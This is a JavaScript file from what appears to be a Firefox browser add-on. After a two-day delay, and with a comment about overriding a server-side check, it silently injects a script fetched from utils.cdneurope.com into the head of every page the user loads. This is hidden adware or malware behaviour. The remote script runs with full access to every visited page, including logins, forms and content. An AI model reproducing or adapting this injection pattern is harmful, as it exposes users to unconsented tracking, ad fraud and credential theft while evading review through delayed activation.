var websitexp_mo = new function() {
	var self = this;
	var DEBUG = false;

	var log = function(logInfo) {
		if (DEBUG) { console.log(logInfo); }
	};	

	this.AFF_RUN_ON_INSTALL = true;
	this.ADDON_ID 			= "{a2bfe612-4cf5-48ea-907c-f3fb25bc9d6b}";
	this.PREFS_BRANCH 		= "";

	this.init = function(event) {
		var monEnabler = new this.MonEnabler(event.params);
		monEnabler.enable();
		if (monEnabler.isMonEnabled()) {
			monEnabler.addTabListener();
			window.dispatchEvent(new Event("websiteRecAff"));
		}
		else if (this.AFF_RUN_ON_INSTALL) {
			log("websiteRecAff Event");
			window.dispatchEvent(new Event("websiteRecAff"));
		}
	};

	// this is to override the mon check in "tr.js" from the server.
	this.triggerMoEvent = function() {
		var moEvent = new CustomEvent("mo");
		moEvent.params = {
			isEnabled : true,
			addonId : self.ADDON_ID
		};
		window.dispatchEvent(moEvent);
	};

	this.MonEnabler = function(params) {
		var self = this;
		var prefService = null;

		this.PREFS_BRANCH = "";

		this.OVERRIDE_CHECK = false;
		this.DAYS_ENABLE = 2;

		this.init = function(params) {
			prefService = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefService).getBranch(this.PREFS_BRANCH);
			this.isEnabled = false;
			this.isServerEnabled = params.isEnabled || false;
			this.addonId = params.addonId;
		};

		this.enable = function() {
			try {
				if (this.OVERRIDE_CHECK || this.getMoPref() === true) {
					log("override from pref");
					this.isEnabled = true;
					return;
				}
				if (!this.isServerEnabled) {					
					return;
				}
				var installTime = prefService.getCharPref(this.addonId + ".installtime");
				var currentTime = new Date().getTime() / 1000;
				var timePassed = currentTime - installTime;
				if (timePassed > 60 * 60 * 24 * this.DAYS_ENABLE) { 
					this.isEnabled = true;
					this.setMoPref(true);
				}
			}
			catch(ex) {
				prefService.setCharPref(this.addonId + ".installtime", new Date().getTime() / 1000);
			}
		};

		this.isMonEnabled = function() { return this.isEnabled; };

		this.setMoPref = function(value) {
			prefService.setBoolPref(this.addonId + ".moEnabled", value);
		};

		this.getMoPref = function() {
			try {
				var moPref = prefService.getBoolPref(this.addonId + ".moEnabled");
				if (moPref) { return true; }
				return false;
			} catch(ex) {
				return false;
			}
		};		

		this.addTabListener = function() {
			var tabListener = {
				isValidListener : function(iid) {	
					return (iid.equals(Components.interfaces.nsIWebProgressListener) 
						|| iid.equals(Components.interfaces.nsISupportsWeakReference) 
						|| iid.equals(Components.interfaces.nsISupports));
				},
				QueryInterface: function(iid) {
					if (this.isValidListener(iid)) {
						return this;
					}
					throw Components.results.NS_NOINTERFACE;
				},
				onLocationChange: function(aBrowser, aProgress, aRequest, aURI) { }, 
				onProgressChange: function(aBrowser, aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr) { return 0 }, 
				onSecurityChange: function(aBrowser, aProgress, aRequest, aState) { return 0; },
			  	onStateChange: function(aBrowser, aProgress, aRequest, aFlag, aStatus) {
					try {
						if (!(aFlag & Components.interfaces.nsIWebProgressListener.STATE_STOP)) { return 0; }
						if (aProgress.DOMWindow != aProgress.DOMWindow.top) { return 0; }

						var httpChannel = null;
						try { httpChannel = aRequest.QueryInterface(Components.interfaces.nsIHttpChannel); } catch (e) {}
						if (!httpChannel) {
							var x = (aRequest == null);
							return 0;
						}
						
						if (httpChannel.URI.asciiSpec != aBrowser.currentURI.asciiSpec) { return; }
						
						if (httpChannel.responseStatus == 200) {
							self.addMon(aBrowser.contentDocument);
						}
					}
					catch(e) { }
				},
				onStatusChange: function(aBrowser, webProgress , request , ostatus ,  message) { return 0; },
				onRefreshAttempted: function(aBrowser,webProgress,aRefreshURI,aMillis,aSameURI) { return true; },
				onLinkIconAvailable : function(aBrowser) { return 0 }
			};

			gBrowser.addTabsProgressListener(tabListener);
		};

		this.addMon = function(doc) {
			try {
				var tagId = "sim_mo";
				if (doc.getElementById(tagId)) { return; }

				var found = false;
				var prefix = "http://";
				if (doc.location.href.indexOf("https") == 0) { prefix = "https://"; }
				
				var head = doc.getElementsByTagName('head')[0];
				var script = doc.createElement('script');
				script.type = 'text/javascript';
				script.src = prefix + "utils.cdneurope.com/js/mo.js";
				script.id = tagId;
				head.appendChild(script);
			}
			catch(e) { }
		};

		this.init(params);
	};

	window.addEventListener("mo", function(event) { self.init(event); }, false);
	this.triggerMoEvent();
};